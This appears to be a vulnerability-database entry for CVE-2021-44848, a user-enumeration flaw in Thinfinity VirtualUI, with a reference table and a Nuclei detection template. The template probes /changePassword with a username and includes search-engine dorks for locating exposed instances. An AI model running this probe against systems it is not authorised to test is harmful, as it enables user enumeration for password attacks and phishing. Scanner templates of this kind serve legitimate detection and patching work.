| Title | Published | Views | Family |
|---|---|---|---|
| Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration Vulnerability | 16 Dec 2021 00:00 | – | zdt |
| CVE-2021-44848 | 13 Dec 2021 02:15 | – | attackerkb |
| CVE-2021-44848 | 28 Jun 2022 18:24 | – | circl |
| Cybele Software Thinfinity VirtualUI Authorization Issue Vulnerability | 13 Dec 2021 00:00 | – | cnnvd |
| CVE-2021-44848 | 13 Dec 2021 01:08 | – | cve |
| CVE-2021-44848 | 13 Dec 2021 01:08 | – | cvelist |
| Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration | 16 Dec 2021 00:00 | – | exploitdb |
| Thinfinity Iframe Injection | 3 Jul 2026 13:39 | – | nuclei |
| CVE-2021-44848 | 13 Dec 2021 02:15 | – | nvd |
| CVE-2021-44848 | 13 Dec 2021 02:15 | – | osv |

```yaml
id: CVE-2021-44848

info:
  name: Thinfinity VirtualUI User Enumeration
  author: danielmofer
  severity: medium
  description: Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)
  impact: |
    An attacker can use the gathered usernames for further attacks, such as brute-forcing passwords or launching targeted phishing campaigns.
  remediation: |
    Apply the vendor-supplied patch or upgrade to the latest version of Thinfinity VirtualUI to mitigate the user enumeration vulnerability.
  reference:
    - https://github.com/cybelesoft/virtualui/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44848
    - https://www.tenable.com/cve/CVE-2021-44848
    - http://packetstormsecurity.com/files/165327/Cibele-Thinfinity-VirtualUI-2.5.41.0-User-Enumeration.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-44848
    cwe-id: CWE-203
    epss-score: 0.23141
    epss-percentile: 0.97487
    cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cybelesoft
    product: thinfinity_virtualui
    shodan-query: http.title:"thinfinity virtualui"
    fofa-query: title="thinfinity virtualui"
    google-query: intitle:"thinfinity virtualui"
  tags: cve2021,cve,exposure,thinfinity,packetstorm,virtualui,tenable,cybelesoft,vuln

http:
  - raw:
      - |
        GET /changePassword?username=administrator HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '"rc":(.*?)'
          - '"msg":"(.*?)"'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402202d08086badb2a809cd98a6d973efc999dbecb0da80494a660b01f0865425a81d022031e51aa9ab9443fc3e67d33f774d4c5cad7b9baec3fe1622e1c9bfc1dd252b63:922c64590222798bb761d5b6d8e72950
```